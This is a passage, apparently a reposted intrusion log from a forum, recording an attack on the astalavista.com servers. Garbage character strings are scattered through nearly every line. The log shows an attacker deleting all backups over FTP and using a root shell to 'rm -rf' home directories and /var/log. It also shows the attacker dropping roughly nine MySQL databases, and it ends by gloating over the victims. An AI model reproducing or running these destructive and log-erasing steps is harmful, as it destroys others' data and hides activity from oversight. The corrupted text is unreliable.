2 b1 `" c" ?( T# V" H0 h. k% k0 Adr-x—— 1 root users 4096 Jun 4 06:13 astalavista.com3 Z* }0 f+ h& s+ w
226 Transfer complete.7 X8 {1 w$ ^% r+ t( O. O+ E
ftp> cd astalavista.com
/ h6 [6 ]7 E _! Z T# J0 z" o# P250 CWD command successful. O& [1 O/ W& ~ o: ^. n
ftp> ls -la' H0 O! M2 \; j
227 Entering Passive Mode (212,254,194,163,2,189)- |/ ~: b0 d- }2 ]
150 Opening BINARY mode data connection for ‘file list’.: r# p5 @& | c. o
-rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar
1 [" D# x# V! I5 {-rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz23 J0 Y, t2 ]- i j+ Y! I3 Y
-rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2
+ }5 `3 [+ x1 h0 F% T-rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-astacom-Public_HTML.tar) |* S3 t+ n" }$ a! }3 y! f
-rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-astacom-SQL_Dump.tar
7 L/ X% ^% W0 f: [# p' S[snip]# \* N: I+ g) y) ^
226 Transfer complete.
' E+ G& m9 l" x5 Wftp> mdelete *
/ e" S9 z6 a1 K( P; fftp> ls -la
. i, ? T& h/ j$ M/ _: I5 p* n$ E) B227 Entering Passive Mode (212,254,194,163,2,193)
6 W- u9 Y& h; {1 M: o150 Opening BINARY mode data connection for ‘file list’.
; o6 _3 x# B( Q* |% a; l226 Transfer complete.
4 {8 ?7 e" l% F3 Bftp>- E- H9 D- ~& l
1 U/ b( W! E4 j* P5 n j
sh-3.2# cd /home" N) H4 V" d3 y8 P) A" M
sh-3.2# ls -la
; @, U3 e* C) N9 z4 q2 o4 wtotal 120
1 ~/ @6 q0 s- M3 h# pdrwxr-xr-x 14 root root 4096 Mar 11 17:56 .
' l+ k3 j& ~2 {' j! t. ?1 \drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..8 y( r* T* C& ~& q! ~( U
drwx–x–x 9 admin admin 4096 Nov 28 2007 admin7 R" H" U% [$ x$ X
-rw——- 1 root root 8192 Jun 4 03:03 aquota.group# Z) T1 x" n( }. u6 g* T- w' O2 x
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user4 H2 W! }, K# u% z: d, z. F
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet1 @' a4 K4 |+ ]- P& i) W0 l+ c
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup0 i* t1 Y# u; W. T
drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161
4 ^' y# R7 V3 K' ndrwx–x–x 10 com com 4096 Apr 28 12:40 com n8 ?4 m9 ]# Q, g) h3 o& k
drwxr-xr-x 2 root root 4096 May 17 2007 ftp( F2 H) \- G4 M0 B" C
drwx—— 3 jon jon 4096 Sep 21 2007 jon
' m4 }2 w5 e% sdrwx—— 2 root root 16384 Sep 11 2007 lost+found/ y, T% F$ ^* \/ c, K0 h
drwxr-xr-x 2 root root 4096 Sep 14 2007 my# ?8 e: l: j \& i* Z
drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata& q1 ^8 i% a8 k/ A1 ?
drwx—— 2 jon jon 4096 Sep 15 2007 test( f/ c% B% e0 h
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp% x: c4 Y: f$ c5 [1 I
& W3 G. \: |$ N- W$ }( A# h
sh-3.2# rm -rf backup/- {0 v) i7 \8 Q6 @, \# d
sh-3.2# rm -rf backup.14161/
# A) b, |, R) f/ X2 g$ ksh-3.2# rm -rf ftp/
9 F/ r4 q* f$ g8 \! m0 ish-3.2# rm -rf jon/5 Q5 [3 R7 a* g) |3 H6 k
sh-3.2# rm -rf my// I3 s% L( Y8 D7 k
sh-3.2# rm -rf mysqldata/
& |- ~ h$ I, _7 h" t0 j6 D$ o; P8 xsh-3.2# rm -rf test/
) @. P" G, ]% L" qsh-3.2# rm -rf tmp/+ d' N& K9 }7 r( C# b7 r8 l
sh-3.2# cd ~. ^# o9 ^2 s8 A0 Y% D
sh-3.2# rm -rf *# S2 a1 X/ u* z" q2 }
sh-3.2# rm -rf /var/log/
- u d" e7 k( e( Z9 {3 i! urm: cannot remove directory `/var/log//proftpd’: Directory not empty
5 |. g, L7 R8 ]2 ~/ Gsh-3.2# rm -rf /home/** r9 P+ [/ v5 `/ g
sh-3.2# mysql( q. [3 E1 N8 p2 }2 c+ [( Z- ?
Welcome to the MySQL monitor. Commands end with ; or \g.: K' l5 P0 M& a" m" x& {
Your MySQL connection id is 4071560 H, d7 ?7 N% V$ A* [
Server version: 5.0.45-community-log MySQL Community Edition (GPL) s- H! l) i# ~( w6 N: c: \9 c
" `0 O! C, v; v( T3 s6 {Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
/ {3 T/ W% d6 Q- o6 A
6 P* Q3 y3 D3 t5 O1 x( fmysql> show databases;! e0 Q+ `. d5 U& {1 X
+———————–+
2 M# r1 X n! O) ^2 d- a| Database |
3 L, C$ ?; `/ g" i$ @+ x6 i+———————–+
$ q2 U/ [$ {1 u| information_schema |
5 }- J2 M3 P8 i9 D| astanet_ads |$ r% {6 u5 @6 A& R9 _
| astanet_mailing_lists |: Z1 }$ M8 v# h" x4 I9 _7 p
| astanet_mediawiki |
6 c! p& i1 Z9 r6 t& ]( f| astanet_membersystem |# t$ v* q6 N! j1 b' i" B
| com_contrexx |
% @" [' m0 Z4 Y3 _, T1 Y( j| com_contrexx2 |
' H4 v- z* N+ c) m$ e8 E| com_contrexx2_live |- h- D8 t" R7 M1 |
| da_roundcube |- y4 p) P" _! A3 E7 |, G) b1 a9 z
| dolphin |
0 @/ N% ^6 J, W* O- e/ b% v" k| ideapool |" H$ V# L5 ~: Q! Z
| mysql |1 b: p$ @/ T. L# }. m0 m! l+ J d3 T
| test |4 c; p$ ]1 J4 ^' q
| yourmaster |1 Y N, H( u3 o9 P2 ~: l
+———————–+
: d/ \% u# X6 a5 k3 c& ^7 B' h14 rows in set (0.03 sec)
D9 |2 j# K3 s4 S
' p1 C' `, w5 k. \mysql> drop database astanet_membersystem;
8 R2 \5 ?0 n: v4 F8 t XdroQuery OK, 46 rows affected (0.81 sec)
0 }$ p) D) m( u& z A4 I0 ?7 k0 I! O6 J! P- w+ A3 I, g
mysql> drop database com_contrexx;# ~% O- M8 Q5 B) D. x& N
Query OK, 211 rows affected (2.72 sec)4 J: O0 p0 [8 d
( {4 j$ G8 a! [7 Smysql> drop database com_contrexx2;. m$ O# t1 N S' E: h/ I+ i3 A
Query OK, 237 rows affected (2.23 sec)
' J( _+ T9 c X# j) r1 ?% y) r7 d8 ] M0 r* R e L
mysql> drop database com_contrexx2_live;
1 Z, \/ q6 s9 zQuery OK, 227 rows affected (7.63 sec) C R1 K& Y5 L8 F2 B/ v
, K- G$ z4 ~4 g; Fmysql> drop database ideapool;! b9 b, R' l8 S9 t! j) E
Query OK, 69 rows affected (0.19 sec)
$ C* X; ^* Z, J- N& t9 j$ k4 U% L
$ w8 }) ^ a) {mysql> drop database yourmaster;* {$ q$ w# U% r8 X# w$ l; U
Query OK, 158 rows affected (0.55 sec)% G: p# k M) M% B$ w! f
5 q6 y$ K8 r+ ^* G$ s
mysql> drop database astanet_ads;
% r* D* e) I. W1 CQuery OK, 9 rows affected (0.11 sec)* \, U. b0 c) y0 g N( H( T. y
9 z" l0 ^ n/ v1 g1 f- \mysql> drop database astanet_mailing_lists;3 i3 P: o; e* [' _
Query OK, 24 rows affected (1.47 sec): h7 Y) l4 }8 R# u1 T% `- y9 Y( Y5 Q& T& p
; y, \! h: [( u0 f% z; hmysql> drop database astanet_mediawiki; Y0 @: Y! D) K3 j% c
Query OK, 31 rows affected (0.51 sec); W2 }; H' C Z; P3 W9 @
8 r' f/ J( m4 R& q% ~6 d D1 k
mysql> show databases;
& D# e$ ?, m: D. m+——————–+8 V; Y7 b# J+ Z% M5 C& [
| Database |
6 D: V' J4 P7 f. T. _6 V. m. `, v+——————–+% T9 L# K, h% n
| information_schema |6 ^$ S0 @# E! `8 v: ]* c, f
| da_roundcube |
1 E1 W8 R9 j( H( T| dolphin |, E. v' j4 |- E" H. Y/ C0 L
| mysql |
5 V7 Q1 ~& ]4 k7 e7 |- s| test |
( g1 B6 A8 Q2 ]0 r8 Y3 W+——————–+, T3 o: s; s; C7 H3 r( G/ w( D
5 rows in set (0.00 sec)1 F/ k* e3 X8 o% R5 i
+ [0 ]7 I& [* f) j; l u% e8 LWhat a journey! We’re not sure exactly why the “Terminator” had any influence on4 a- _7 k6 f" h& A
their naming (conventions) but we’re sure Arnold himself wouldn’t be in the
$ |3 V! z, Y0 S" P/ F2 p# Owrong to say this pack of morons *wont be back*.3 x5 c# _# V2 A# ]: N& e
|
发表于 2012-11-6 21:07:34
收藏
支持
反对